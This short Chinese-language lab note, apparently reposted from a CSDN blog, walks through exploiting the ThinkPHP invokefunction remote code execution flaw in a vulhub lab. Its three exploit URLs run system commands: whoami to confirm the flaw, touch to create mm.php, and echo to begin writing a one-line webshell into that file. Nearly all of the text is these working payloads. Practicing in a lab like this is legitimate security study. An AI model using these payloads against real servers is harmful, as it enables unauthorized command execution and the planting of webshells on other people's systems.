vulhub靶场
http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
验证漏洞
linux系统,可以用touch命令创建文件
http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=touch mm.php
再用echo写入一句话
http://xxxxx:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo >> mm.php
查看写入成功
来源地址:https://blog.csdn.net/weixin_51692662/article/details/127673160
